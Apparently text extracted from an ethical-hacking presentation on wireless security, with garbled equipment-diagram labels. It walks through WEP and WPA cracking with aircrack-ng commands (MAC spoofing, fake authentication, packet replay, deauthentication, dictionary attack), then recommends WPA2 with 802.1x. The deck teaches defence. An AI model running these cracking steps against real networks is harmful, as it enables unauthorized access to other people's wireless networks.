Network Security and Ethical Hacking

Network Security and Ethical Hacking - Wireless

Jason MaynardCCDA, CCIP, CCNP, GSEC, GCFWInfrastructure Architect


• Is it Secure?

It really depends on the methods used to secure it.


Encryption and Authentication Methods


Short for Wired Equivalent Privacy, a security protocol for wireless local area networks (WLANs) defined in the 802.11b standard.

WEP


WPA

Short for Wi-Fi Protected Access, a Wi-Fi standard that was designed to improve upon the security features of WEP.


WPA2

Short for Wi-Fi Protected Access 2, the follow on security method to WPA for wireless networks that provides stronger data protection and network access control, Based on the IEEE 802.11i standard


Mac Authentication is easy to sniff and spoof, can still get the SSID by sniffing the network


Couple of demos• WEP • WPA


Items Needed • USB Key with Backtrack3 (Linux distro used for ethical hacking)• DWA-642 PCMICA Card (atheros chipset and uses the madwifi-ng driver)• Access Point running WEP and then run WPA• 2 Client Laptops running Linux and Windows connecting to the AP


Command Line Tools

•ifconfig•iwconfig•macchanger•airmon-ng•airdump-ng•airreplay-ng•aircrack-ng


Open a couple of terminals – Type “iwconfig” identify the cards– Type “ifconfig” determine which cards are up– Type “airmon-ng stop wifi0” and “airmon-ng stop ath0” to ensure the

cards are not running in monitor mode– Type “ifconfig ath0 down” and “ifconfig wifi0 down” to ensure the

interface is down


– Type “maccchanger –mac 00:11:22:33:44:55 wifi0” changes mac address – Type “airmon-ng start wifi0” put card in monitor mode – Type “airodump ath0” find AP that is running WEP or WPA then copy the SSID – stop the

scanWEP Cracking – Type “airodump –w wep.cap –c “channel #” –bssid “SSID in HEX” ath0” (this captures

packets sent to the AP)– New Terminal – Type “aireplay-ng -1 0 –a “SSID” –h “MAC in HEX” ath0” (this fakes authentication)


– Go to another terminal– Type “aireplay-ng -2 –p 0841 -b “SSID” –h “MAC in HEX” ath0” (interactive packet replay)– Go to another terminal– Type “aircrack-ng wep*.cap”WPA Cracking– Type “airodump –w wpa.cap –c “channel #” –bssid “SSID in HEX” ath0” (this captures packets sent to

the AP)– Type “aireplay-ng -0 5 -a “SSID” ath0” (DEAuthentication)– Type “aircrack-ng -0 –x2 wpa*.cap –w /pentest/wireless/aircrack-ng/test/password.lst”


So what do I do to protect my network and wireless users?


Use WPA2 with 802.1x


WPA2 provides government grade security by implementing the National Institute of Standards and Technology (NIST) FIPS 140-2 compliant AES encryption algorithm and 802.1x-based authentication


802.1X provides port-based authentication, which involves communications between a supplicant, authenticator, and authentication server.


802.1X – The most secure methods• EAP – PEAP• EAP – TLS


EAP – PEAP• Uses Server certificates and MSCHAPv2


EAP – TLS • One of the most secure methods uses client

and server certificate. More difficult to manage.


Cisco 4500

Wireless LAN Solution

Cisco WLC 4400

Novell Netware 6.5 SP5

Windows 2003 Ent Server running ACS 4.0

HP Laptop802.1x (EAP-PEAP)WPA2

Cisco LWAPP gets its configuration from the WLC using LWAPP protocol.

1. Users enter their Novell Credentials to log onto the Wireless network.

2.Cisco WLC forwards the users credential to the ACS server.

3.Cisco ACS forwards the credentials to the Netware 6.5 SP 5 server or Windows 2003 Ent Server running ACS 4.0 will have Edirectory installed locally making it more secure.

4. Novell checks its directory services for the user account and validates the users credentials.

5.Users is granted access to WLAN.

SSL LDAP

SSL LDAP

CISCO AIRONET 1200 I WIRELESS ACCESS POINT

Cisco 4400 Series

WIRELESS LAN CONTROLLER

MODEL 4402 25 APCONSOLE

STATUS

ALARM

PS1

PS2

LINK ACT

SERVICE

LINK ACT

UTILITY 1 2

LINK

ACT

1

2

3

Power Supply 1 Power Supply 2

CatalystSERIES4000 GOOD

FAIL100-240 V

9 - 4 A650 W

60/50 Hz

GOOD

FAIL100-240 V

9 - 4 A650 W

60/50 Hz

MAX 15.4W/PORT

STATUS

WS-X4548-GB-RJ45V

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16

MULTI-SPEEDGIGABIT ETHERNET

SWITCHING MODULE

48-PORT10/100/1000 BASE T

IN-LINE POWER

3231

3029

2827

2625

2423

2221

2019

1817

4847

4645

4443

4241

4039

3837

3635

3433

1615

1413

1211

109

87

65

43

21

32313029282726252423222120191817 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48

MAX 15.4W/PORT

STATUS

WS-X4548-GB-RJ45V

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16


SWITCHING MODULE

48-PORT10/100/1000 BASE T

IN-LINE POWER

3231

3029

2827

2625

2423

2221

2019

1817

4847

4645

4443

4241

4039

3837

3635

3433

1615

1413

1211

109

87

65

43

21

32313029282726252423222120191817 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48

MAX 15.4W/PORT

STATUS

WS-X4548-GB-RJ45V

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16


SWITCHING MODULE

48-PORT10/100/1000 BASE T

IN-LINE POWER

3231

3029

2827

2625

2423

2221

2019

1817

4847

4645

4443

4241

4039

3837

3635

3433

1615

1413

1211

109

87

65

43

21

32313029282726252423222120191817 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48

MAX 15.4W/PORT

STATUS

WS-X4548-GB-RJ45V

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16


SWITCHING MODULE

48-PORT10/100/1000 BASE T

IN-LINE POWER

3231

3029

2827

2625

2423

2221

2019

1817

4847

4645

4443

4241

4039

3837

3635

3433

1615

1413

1211

109

87

65

43

21

32313029282726252423222120191817 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48

Catalyst 3560 SERIES

SYST

MODE

SPEEDDUPLX

POE

STAT

RPS

1X

18X

17X

16X2X

15X 31X

32X 34X

33X 47X

48X

11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 481 2 3 4 5 6 7 8 9 10

1

PoE-48

3

2 4

Cisco LWAPP gets its configuration from the WLC using LWAPP protocol.

CISCO AIRONET 1200 I WIRELESS ACCESS POINT

Cisco 1242 LWAPP using HREAP to do local switching.

Cisco 1242 LWAPP

HP Laptop802.1x (EAP-PEAP)WPA2

Remote Sites

Mississauga


• FreeRadius and OpenSSL• Microsoft Radius and Group Policy, Certificate Services• Cisco ACS server and Local Authentication/AD/NDS

Supporting Products:


Support Products Links:

Backtrack• http://www.remote-exploit.org/backtrack_download.html

FreeRadius and OpenSSL• http://wiki.freeradius.org• http://www.openssl.org

Cisco ACS• http://www.cisco.com/en/US/products/sw/secursw/ps2086

Microsoft• http://www.microsoft.com/technet/security/prodtech/

windowsserver2003/pkiwire/swlan.mspx?mfr=true• http://technet.microsoft.com/en-us/magazine/cc162468.aspx

http://www.remote-exploit.org/backtrack_download.html


Questions?

Documents

Network Security and Ethical Hacking